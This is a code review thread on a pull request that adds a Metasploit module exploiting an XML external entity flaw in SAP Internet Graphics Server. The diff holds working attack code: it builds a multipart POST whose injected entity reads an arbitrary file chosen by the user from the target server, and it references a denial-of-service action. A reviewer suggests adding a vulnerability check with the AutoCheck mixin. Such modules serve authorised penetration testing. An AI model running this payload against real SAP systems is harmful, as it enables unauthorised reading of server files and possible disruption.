modules/auxiliary/admin/sap/sap_igs_xxe.rb

```diff
@@ -0,0 +1,420 @@
+    when 'READ'
+      action_file_read
+    when 'DOS'
+      action_dos
+    else
+      print_error("Not supported action: #{action.name}")
+    end
+  end
+
+  def action_file_read
+
+    # region Make HTTP request
+    get_variables
+
+    data_xml = { name: 'data' , filename: 'data.xml', data: nil }
+    data_xml[:data] = %{<?xml version='1.0' encoding='UTF-8'?>
+    <ChartData>
+      <Categories>
+        <Category>ALttP</Category>
+      </Categories>
+      <Series label="Hyrule">
+        <Point>
+          <Value type="y">4444</Value>
+        </Point>
+      </Series>
+    </ChartData>}
+
+    xxe_xml = { name: 'custo' , filename: 'custo.xml', data: nil }
+    xxe_xml[:data] = %{<?xml version='1.0' encoding='UTF-8'?>
+    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM "#{@file}">]>
+    <SAPChartCustomizing version="1.1">
+      <Elements>
+        <ChartElements>
+          <Title>
+            <Extension>&xxe;</Extension>
+          </Title>
+        </ChartElements>
+      </Elements>
+    </SAPChartCustomizing>}
+
+    data = Rex::MIME::Message.new
+    data.add_part(data_xml[:data], "application/xml", nil, "form-data; name=\"#{data_xml[:name]}\"; filename=\"#{data_xml[:filename]}\"")
+    data.add_part(xxe_xml[:data], "application/xml", nil, "form-data; name=\"#{xxe_xml[:name]}\"; filename=\"#{xxe_xml[:filename]}\"")
+    # endregion
+
+    # region Send HTTP request
+    begin
+      first_response = nil
+      first_response = send_request_cgi(
+          {
+              'uri' => normalize_uri(@urn),
+              'method' => 'POST',
+              'ctype' => "multipart/form-data; boundary=#{data.bound}",
+              'data' => data.to_s,
+          }, @timeout
+      )
+    rescue => e
+      print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@urn}")
+      if @verbose
+        print_error("Error: #{e.class}: #{e}")
+      end
+    end
+    # endregion
+
+    # region Check HTTP response
+    begin
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.code == 200
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless "Content-Type".in? first_response.headers
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.headers['Content-Type'].strip.start_with?('text/html')
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.include? "Picture"
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.include? "Info"
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.match? /ImageMap|Errors/
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.include? "/output/"
+    rescue NameError
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}")
+    end
```

Comment:
You should really be defining a `check` method for this type of check, and then calling that to determine if the target is vulnerable or not. 

You can even use the `AutoCheck` mixin with `prepend Msf::Exploit::Remote::AutoCheck` which would then allow you t automatically check if the target is vulnerable prior to running any additional attacks against it.

Reply:
Will be added:
```
class MetasploitModule < Msf::Auxiliary

  prepend Msf::Exploit::Remote::AutoCheck
```

Reply:
https://github.com/rapid7/metasploit-framework/blob/09532500b87af0d16f80b622d487dde481aac54d/modules/auxiliary/admin/sap/sap_igs_xxe.rb#L8